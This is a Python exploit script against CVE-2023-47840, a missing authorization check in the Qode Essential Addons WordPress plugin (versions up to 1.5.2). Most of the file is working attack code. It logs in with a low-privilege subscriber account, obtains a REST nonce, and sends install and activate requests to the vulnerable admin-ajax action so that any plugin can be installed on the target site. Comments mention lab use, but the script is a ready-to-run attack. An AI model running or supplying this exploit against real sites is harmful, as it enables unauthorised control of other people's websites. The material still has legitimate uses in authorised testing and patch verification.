#!/usr/bin/env python3
import argparse
import getpass
import os
from urllib.parse import urlsplit

import requests


#
# Exploit script by @RandomRobbieBF
#

# Outbound proxy for every request below (requests reads HTTP_PROXY/HTTPS_PROXY
# from the environment at request time).  An empty value is skipped by urllib's
# environment proxy lookup, so leaving this "" also overrides any proxy exported
# by the shell; set it to e.g. "http://127.0.0.1:8080" to inspect the traffic in
# an intercepting proxy.
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy

# Ignore bad SSL
# NOTE(review): this only silences urllib3's InsecureRequestWarning; certificate
# checking is actually turned off via verify=False in the function below, so the
# supplied WordPress credentials are sent to whatever answers at --url.  Fine
# for a lab target you control, inappropriate anywhere else.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

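def login_and_activate_plugin(siteurl, wp_user, wp_pass, slug, *, timeout=30):
    """Log in to WordPress and use the plugin's admin-ajax action to install and activate *slug*.

    Flow: authenticate through ``wp-login.php``, fetch a REST nonce from
    ``admin-ajax.php?action=rest-nonce``, then send two ``install_plugin``
    admin-ajax requests (``pluginAction=install`` followed by
    ``pluginAction=activate``) carrying that nonce and the plugin slug.
    TLS verification is disabled on the session, so only point this at
    targets you are authorised to test.

    Args:
        siteurl: Base URL of the WordPress site (scheme and host, optional path);
            a trailing slash is tolerated.
        wp_user: Username of an account on the site; per the advisory,
            subscriber-level access is enough.
        wp_pass: Password for ``wp_user``.
        slug: Plugin slug passed as ``pluginSlug`` to the vulnerable action.
        timeout: Per-request timeout in seconds, so an unresponsive target
            cannot stall the script indefinitely.

    Raises:
        SystemExit: status 1 when no ``wordpress_logged_in`` cookie is set
            after login, or when the nonce response does not look like a nonce.
        requests.RequestException: on connection errors or timeouts.
    """
    # Tolerate "https://host/" so URLs below do not end up with "//wp-login.php".
    siteurl = siteurl.rstrip('/')
    parts = urlsplit(siteurl)
    # Derive Origin from the target instead of a hard-coded lab hostname so the
    # header is consistent with the site actually being tested.
    origin = f"{parts.scheme}://{parts.netloc}"
    ajax_url = f"{siteurl}/wp-admin/admin-ajax.php"

    session = requests.Session()
    session.verify = False  # Ignore SSL verification (lab targets only)

    # Log in. On success wp-login.php redirects and the auth cookies are stored
    # in the session jar, which is what the later requests rely on.
    session.post(
        f"{siteurl}/wp-login.php",
        data={
            'log': wp_user,
            'pwd': wp_pass,
            'rememberme': 'forever',
            'wp-submit': 'Log+In',
        },
        timeout=timeout,
    )
    # Confirm successful login
    if not any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("Failed to log in.")
        raise SystemExit(1)
    print("Logged in successfully.")

    # Get REST API Nonce
    print('Getting REST API Nonce!')
    nonce_response = session.get(f"{ajax_url}?action=rest-nonce", timeout=timeout)
    rest_nonce = nonce_response.text.strip()
    # admin-ajax typically answers "0" (or an HTML error page) when the action is
    # refused; a real nonce is a short token, so stop here rather than sending
    # that body on as the nonce.
    if not rest_nonce or rest_nonce == "0" or "<" in rest_nonce or len(rest_nonce) > 64:
        print("Failed to obtain a REST nonce, response was: " + repr(rest_nonce[:80]))
        raise SystemExit(1)
    print("Nonce Found: " + rest_nonce)

    headers = {
        "Origin": origin,
        "Accept": "application/json, text/plain, */*",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Referer": siteurl,
        "Connection": "close",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
    }

    # Install, then activate: both go to the same vulnerable action and differ
    # only in pluginAction.
    for plugin_action, banner in (("install", "Installing Plugin!"), ("activate", "Activate Plugin!")):
        print(banner)
        params_post = {
            "action": "install_plugin",
            "pluginAction": plugin_action,
            "pluginSlug": slug,
            "nonce": rest_nonce,
        }
        response = session.post(ajax_url, data=params_post, headers=headers, timeout=timeout)
        # The script does not interpret the result; the raw response is left to
        # the operator to read.
        print(f"HTTP STATUS: {response.status_code} Response: {response.text}")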
    


# Advisory summary shown by argparse as the --help description.
DESCRIPTION = (
    "\n"
    "Qode Essential Addons <= 1.5.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation\n"
    "Description\n"
    "CVE-2023-47840 - The Qode Essential Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin() function in all versions up to, and including, 1.5.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins."
)


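if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description=DESCRIPTION,
        # Keep the multi-line advisory text as written instead of letting
        # argparse reflow it into a single paragraph.
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('--url', required=True, help='URL of the WordPress site')
    parser.add_argument('--username', required=True, help='WordPress username')
    # Optional on the command line: when omitted the password is read from the
    # terminal so it does not land in shell history or `ps` output.
    parser.add_argument('--password', help='WordPress password (prompted for if omitted)')
    parser.add_argument('--slug', required=True, help='WordPress Plugin Slug')
    parser.add_argument(
        '--proxy',
        default=None,
        help='HTTP(S) proxy to route all traffic through, e.g. http://127.0.0.1:8080',
    )
    args = parser.parse_args()

    password = args.password if args.password is not None else getpass.getpass('WordPress password: ')
    # requests reads the proxy variables from the environment at request time,
    # so setting them here is enough to affect every call made below.
    if args.proxy:
        os.environ['HTTP_PROXY'] = args.proxy
        os.environ['HTTPS_PROXY'] = args.proxy

    login_and_activate_plugin(args.url, args.username, password, args.slug)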